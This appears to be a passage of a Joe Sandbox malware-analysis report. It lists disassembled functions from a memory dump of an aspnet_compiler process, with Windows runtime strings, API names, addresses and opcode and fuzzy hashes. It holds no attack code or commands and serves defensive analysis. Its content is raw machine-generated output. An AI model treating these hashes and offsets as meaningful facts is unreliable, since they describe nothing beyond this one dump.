                                                    • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                    Function 00A98788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • WindowsExcludedProcs, xrefs: 00A987C1
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00A98914
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00A98827
                                                    • Kernel-MUI-Language-SKU, xrefs: 00A989FC
                                                    • Kernel-MUI-Number-Allowed, xrefs: 00A987E6
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                    • Instruction ID: cc9c08e51eaef2e9edfab93a9b0e80f7bf7f0d6c999efbb6c97ac7f7e2a2df57
                                                    • Opcode Fuzzy Hash: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                    • Instruction Fuzzy Hash: FBF1D6B2E00249EFCF11EF95CA819EEB7F9FF09300F15846AE505A7211EB359A45DB60
                                                    Function 00B0822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: _wcsnlen
                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                    • API String ID: 3628947076-1387797911
                                                    • Opcode ID: 91b8789fab85c9fa39730a2bdcec1c429cb8faed84ba298ae40b10c9de59b2ef
                                                    • Instruction ID: 0f7c0023ea2f2e9d392612a68447ab364dd37c9167abe8433d80c462b2efd06f
                                                    • Opcode Fuzzy Hash: 91b8789fab85c9fa39730a2bdcec1c429cb8faed84ba298ae40b10c9de59b2ef
                                                    • Instruction Fuzzy Hash: 5841D572240319BEEB019AD1DC82FDEBBECAF08B44F100152BA44E60D1DBB0DB008FA4
                                                    Function 00AB13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                    • Instruction ID: 73cc18af1fa9017f7925262be259ede0acc4c2233492ba7f3f330d7c579eb102
                                                    • Opcode Fuzzy Hash: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                    • Instruction Fuzzy Hash: 4F613BB1900655AACB34DF59C8A08FFBBF9EF94300754C42EF4DA4B642E3349A40DBA0
                                                    Function 00B13B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 88af2bce79a17bb3cc90be2ceda98a5521076df1e0fc898bf03ee77349a4797a
                                                    • Instruction ID: 5d17bc7fe7ecc365ab70aaddfe6af5e5d318595b264c93c2d89ffdf70e67f0db
                                                    • Opcode Fuzzy Hash: 88af2bce79a17bb3cc90be2ceda98a5521076df1e0fc898bf03ee77349a4797a
                                                    • Instruction Fuzzy Hash: 096190B6904748AECF20DF59C8414BEBBF5EF54710B54C5AAF8ADA7141F234EB809B90
                                                    Function 00AA7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AC3F12
                                                    Strings
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AC3EC4
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00ACE2FB
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AC3F75
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AC3F4A
                                                    • ExecuteOptions, xrefs: 00AC3F04
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 00ACE345
                                                    • Execute=1, xrefs: 00AC3F5E
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 3901378454-484625025
                                                    • Opcode ID: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                    • Instruction ID: a8651ef1699448fbfff9239e1310a2b11b3e1fff0a88065a6d8e25aa8ed3b3ee
                                                    • Opcode Fuzzy Hash: 4dd6d300e07433dd5268038af5517cea92cce1399145baaddfebbfd62f8cee95
                                                    • Instruction Fuzzy Hash: A9419572A4031C7ADF20DB94DD86FDF73BCAB15700F0085A9B509A71C1EB70AB458BA1
                                                    Function 00AB0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction ID: c8c82aeadabb0ebd0fed61d8f7a7588cdaaf12bc93c51caf5d738e2111e35faa
                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction Fuzzy Hash: 09A17C7190030AEFCB24DF64C855AFFBBBCAF16305F2485AAD852A7283D7349A41DB51
                                                    Function 00AB0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD2206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                    • Instruction ID: 1bd93c8488373b71905e1c8b4630c2df579ce163bbfd0c77ee2a0a865f7c9e53
                                                    • Opcode Fuzzy Hash: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                    • Instruction Fuzzy Hash: 2851FC327042116FDB159B14CC81FA673A9AFA8720F21C66AFD5ADF386DA71EC41C790
                                                    Function 00AB14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 00ADEA22
                                                      • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB146B
                                                      • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB1490
                                                    • ___swprintf_l.LIBCMT ref: 00AB156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                    • Instruction ID: 3e4ed00255f70ca0db467dfbb1e8b9f7557caccd607026d6cbaab95e543ba714
                                                    • Opcode Fuzzy Hash: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                    • Instruction Fuzzy Hash: F521C372900219ABCB30DF54CD51AEF73BCBB50701F848552FC4AD7142DB70AA598BE0
                                                    Function 00B13DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 8fb5fc8b60e55dfed5ca5bd37995dafd1a2e2239c7af32743225f5a644a11d86
                                                    • Instruction ID: 268769bbc04491396eda88f1dd5ee8f744e10468f21c684679bf3ace20326f59
                                                    • Opcode Fuzzy Hash: 8fb5fc8b60e55dfed5ca5bd37995dafd1a2e2239c7af32743225f5a644a11d86
                                                    • Instruction Fuzzy Hash: D221A1B390022AABCB10AF65DC459EF77ECEB14B14F4445A6FC0897141F7709E9487E1
                                                    Function 00A953A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD22F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00AD2328
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD22FC
                                                    • RTL: Resource at %p, xrefs: 00AD230B
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                    • Instruction ID: cd9ccc99a3cf90f74e2ff6bb3b61c0381724d4bc931ada5cbeb2ee8193e732a4
                                                    • Opcode Fuzzy Hash: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                    • Instruction Fuzzy Hash: 9051D4727006056BDF119B38DD92FA773E8AF58360F11462AF919DF282EA61E941C7A0
                                                    Function 00A9EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AD24BD
                                                    • RTL: Re-Waiting, xrefs: 00AD24FA
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AD248D
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                    • Instruction ID: f11e6a1eaff6db1fe2eea082ce974e9f3744e7dcae54dc36853e7edae2e0f247
                                                    • Opcode Fuzzy Hash: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                    • Instruction Fuzzy Hash: 2341C5B1600204ABCB20DB68DD85FAA77F8AF44720F20C656F95A9B3C2D774E941C7A0
                                                    Function 00AAFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID:
                                                    • API String ID: 3965848254-0
                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction ID: 6a50e41646b47c1980c265edfacf295a30a039e2d4310635294674c490e1da3c
                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction Fuzzy Hash: CD916D71E0024AEFDF28DF98C8456AEB7B4EF56314F24807AD451AB2A2E7305A41CB91
                                                    Function 00B25CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: $$0
                                                    • API String ID: 1302938615-389342756
                                                    • Opcode ID: bb74095c90da877abe7435c5b7bb5633962ed9aa1acbadf8bd31480f3049520a
                                                    • Instruction ID: 607d17a0257ac63cbecaab47290664ce70efb2641079f61a36ac66868d9c3721
                                                    • Opcode Fuzzy Hash: bb74095c90da877abe7435c5b7bb5633962ed9aa1acbadf8bd31480f3049520a
                                                    • Instruction Fuzzy Hash: BC91AF70D046AAAEDF34DFA8A5447EDBBF0EF01350F1446EAD8A9A7291C3744A41CB51